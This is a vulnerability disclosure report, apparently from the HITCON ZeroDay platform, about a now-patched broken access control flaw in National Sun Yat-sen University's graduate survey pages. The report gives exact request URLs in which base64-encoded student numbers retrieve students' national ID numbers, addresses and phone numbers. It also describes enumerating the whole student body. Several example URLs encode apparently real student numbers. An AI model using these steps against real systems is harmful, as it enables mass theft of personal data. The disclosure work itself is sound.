Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2024-00665
- 發信 Vendor: TACERT台灣學術網路危機處理中心
- Title: 國立中山大學 存取權限失控、在校生與畢業學生個資外洩
- Introduction: 網頁參數權限控制失效,只需有學號,即可調閱學生資料。
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2024/06/09 22:37:07 : 新提交 (由 Friday_player 更新此狀態)
- 2024/06/10 00:47:54 : 新提交 (由 Friday_player 更新此狀態)
- 2024/06/11 21:20:27 : 新提交 (由 Friday_player 更新此狀態)
- 2024/06/13 10:53:22 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/06/14 19:22:38 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/06/14 19:22:38 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/07/17 12:04:27 : 已修補 (由 組織帳號 更新此狀態)
- 2024/07/17 20:04:08 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/07/17 20:07:29 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/07/17 20:09:04 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/07/17 20:14:44 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2024/07/25 03:00:20 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2024-00665
- 通報者:Fridayer (Friday_player)
- 風險:嚴重
- 類型:存取控制缺陷 (Broken Access Control)
參考資料
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
相關網址
https://140.117.147.250/graduated/instruction.php
https://sis.nsysu.edu.tw/graduated/instruction.php?ID=QjExMzAxNTAzMg==&GPID=7
https://sis.nsysu.edu.tw/graduated/instruction.php?ID=QjExMzAxNTAzMg==&GPID=7&APFLAG=
https://sis.nsysu.edu.tw/graduated/instruction.php?ID=QjExMzAxNTAzMg==&GPID=7&APFLAG=9527XD
https://sis.nsysu.edu.tw/graduated/First.php
https://sis.nsysu.edu.tw/graduated/page1_chinese.php
https://sis.nsysu.edu.tw/graduated/page1_english.php
https://sis.nsysu.edu.tw/graduated/instruction.php?ID=QjA2MzA5MDAyMA==&GPID=7
敘述
-
開啟「畢業生離校問卷」網頁,發現所需的對應參數;ID、GPID、APFLAG。
-
發現所需的對應參數,測試ID用學生學號作為引數。
- ID: 填寫「學號經Base64轉換值」,如: B*** 轉換成 QjExMzAxNTAzMg== 。
- GPID: 經過交叉測試流水號後得到7,GPID=7
- APFLAG: 發現該參數可不使用或空值或任意值,APFLAG=、APFLAG=9527XD、APFLAG=03
-
測試更新加入ID參數,並測試GET或POST方式,以下測試僅提供GET方式。
第一種
https://sis.nsysu.edu.tw/graduated/instruction.php?GPID=7&ID= + 學號轉base64
第二種
https://sis.nsysu.edu.tw/graduated/instruction.php?GPID=7&ID= + 學號轉base64 + &APFLAG= + 空值或任意值
E.g.:
https://sis.nsysu.edu.tw/graduated/instruction.php?ID=QjExMzAxNTAzMg==&GPID=7
由網頁參數看到的值: APFLAG=03。
3-1
https://sis.nsysu.edu.tw/graduated/instruction.php?ID=QjExMzAxNTAzMg==&GPID=7&APFLAG=03
3-2. 嘗試隨機輸入APFLAG。
https://sis.nsysu.edu.tw/graduated/instruction.php?ID=QjExMzAxNTAzMg==&GPID=7&APFLAG=
https://sis.nsysu.edu.tw/graduated/instruction.php?ID=QjExMzAxNTAzMg==&GPID=7&APFLAG=9527XD -
透過系統流程得知下列三個網址。
4-1 First.php載入後,再載入問卷第一頁(中文版/英文版) -
透過離校問卷第一頁(中文版) 或 (英文版),可獲得學生的個資。
個資如: 姓名、學號、系所、身分證字號、戶籍地址、通訊地址、手機、市話、個人Email -
發現更新網頁session(PHPSESSION),瀏覽器可用人工刪除,網頁將會重新獲得,
額外發現: 使用該SESSION ID使用更換瀏覽器亦可獲得該學生狀態。
https://sis.nsysu.edu.tw/graduated/instruction.php?ID=QjA2MzA5MDAyMA==&GPID=7 -
使用其他學號測試,如: ID=B***,可連續取得其他學生的個資。
-
可透過程式化獲得依照該校學號規則,獲得全校畢業或在校生的個資。
總結進入該頁面進入方法共有8種(4條路*2結果頁面)路徑,整理如下:
方法一
e.g. https://sis.nsysu.edu.tw/graduated/instruction.php?GPID=7&ID=QjExMzAxNTAzMg==
- https://sis.nsysu.edu.tw/graduated/instruction.php?GPID=7&ID= + 使用BASE64演算法轉換學生學號
- https://sis.nsysu.edu.tw/graduated/First.php
- https://sis.nsysu.edu.tw/graduated/page1_chinese.php (結果一)
- https://sis.nsysu.edu.tw/graduated/page1_english.php (結果二)
方法二
- https://sis.nsysu.edu.tw/graduated/instruction.php?GPID=7&ID= + 使用BASE64演算法轉換學生學號
- https://sis.nsysu.edu.tw/graduated/page1_chinese.php (結果一)
- https://sis.nsysu.edu.tw/graduated/page1_english.php (結果二)
方法三
e.g. https://sis.nsysu.edu.tw/graduated/instruction.php?ID=QjExMzAxNTAzMg==&GPID=7&APFLAG=9527XD
- https://sis.nsysu.edu.tw/graduated/instruction.php?GPID=7&ID= + 使用BASE64演算法轉換學生學號 + &APFLAG= + 任意值
- https://sis.nsysu.edu.tw/graduated/First.php
- https://sis.nsysu.edu.tw/graduated/page1_chinese.php (結果一)
- https://sis.nsysu.edu.tw/graduated/page1_english.php (結果二)